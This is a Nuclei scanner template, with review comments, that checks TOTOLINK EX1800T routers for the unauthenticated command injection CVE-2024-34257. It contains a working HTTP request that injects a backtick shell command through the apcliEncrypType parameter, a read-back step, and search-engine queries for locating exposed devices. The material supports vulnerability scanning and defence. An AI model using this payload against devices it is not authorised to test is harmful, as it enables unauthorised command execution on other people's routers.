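# Nuclei template: checks for unauthenticated command injection in the
# apcliEncrypType parameter of /cgi-bin/cstecgi.cgi (CVE-2024-34257).
#
# How the check works: request 1 submits a setWiFiExtenderConfig call with an
# empty token; request 2 fetches a randomly named .txt file from the web root.
# A finding is reported only when all three matchers below agree.
#
# Operational caveat: a positive check leaves `<random>.txt` (holding `id`
# output) on the device, and the template has no cleanup step. Remove the file
# after testing and record its name in the scan notes.
#
# Detection: the signal visible in this template is a POST to
# /cgi-bin/cstecgi.cgi whose JSON `apcliEncrypType` value contains shell
# metacharacters (backticks here) together with an empty `token`.
id: CVE-2024-34257

info:
  # The product name was duplicated in the original title.
  name: TOTOLINK EX1800T - Command Injection
  author: pussycat0x
  severity: high
  description: |
    TOTOLINK EX1800T V9.1.0cu.2112_B20220316 has a vulnerability in the apcliEncrypType parameter that allows unauthorized execution of arbitrary commands, allowing an attacker to obtain device administrator privileges.
  reference:
    - https://github.com/ZackSecurity/VulnerReport/blob/cve/totolink/EX1800T/1.md
    - https://immense-mirror-b42.notion.site/TOTOLINK-EX1800T-has-an-unauthorized-arbitrary-command-execution-vulnerability-2f3e308f5e1d45a2b8a64f198cacc350
    - https://github.com/20142995/nuclei-templates
  classification:
    epss-score: 0.00043
    epss-percentile: 0.0926
  metadata:
    vendor: totolink
    # NOTE(review): this product string names a different model than the
    # EX1800T in the title and description. It looks copied from another
    # template; confirm the intended CPE product before relying on it for
    # asset correlation.
    product: a3700r_firmware
    shodan-query: 'http.title:"totolink"'
    fofa-query: 'title="totolink"'
    google-query: 'intitle:"totolink"'
  # `intrusive` added: the check writes a file on the target, so scans that
  # exclude state-changing templates should be able to skip it.
  tags: cve,cve2024,rce,unauth,intrusive

variables:
  # Random file name so concurrent or repeated scans do not read each other's
  # output.
  file: "{{rand_base(6)}}"

http:
  - raw:
      # Request 1: the configuration call carrying the probe value.
      - |
        POST /cgi-bin/cstecgi.cgi HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Referer: {{RootURL}}/page/index.html

        {
          "token":"",
          "apcliEncrypType":"`id>../{{file}}.txt`",
          "topicurl":"setWiFiExtenderConfig"
        }
      # Request 2: read back the file the probe is expected to create.
      - |
        GET /{{file}}.txt HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      # The CGI acknowledged the configuration call.
      - type: word
        part: body_1
        words:
          - '"success": true'

      # The fetched file contains `id` output. The character class accepts
      # digits, lowercase letters and literal parentheses only, so an account
      # name with uppercase letters, '-' or '_' would not match.
      - type: regex
        part: body_2
        regex:
          - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"

      # NOTE(review): no `part` is given here, so which response's status is
      # checked depends on nuclei's default for multi-request templates.
      # Confirm it is the GET response.
      - type: status
        status:
          - 200
# NOTE(review): the digest below was issued for the original template text.
# Re-sign after applying any edit; nuclei is expected to treat a template whose
# digest does not match as unsigned (confirm for your nuclei version).
# digest: 490a00463044022055626dc912a0f417ae790a1b7f990a2b3cf95e22f8ba964c7d032fbee8b697f502200ec6da65f291cccddaaac0b9998cdeb9cc8179b2115e8bcad0d49d15c815f7fa:922c64590222798bb761d5b6d8e72950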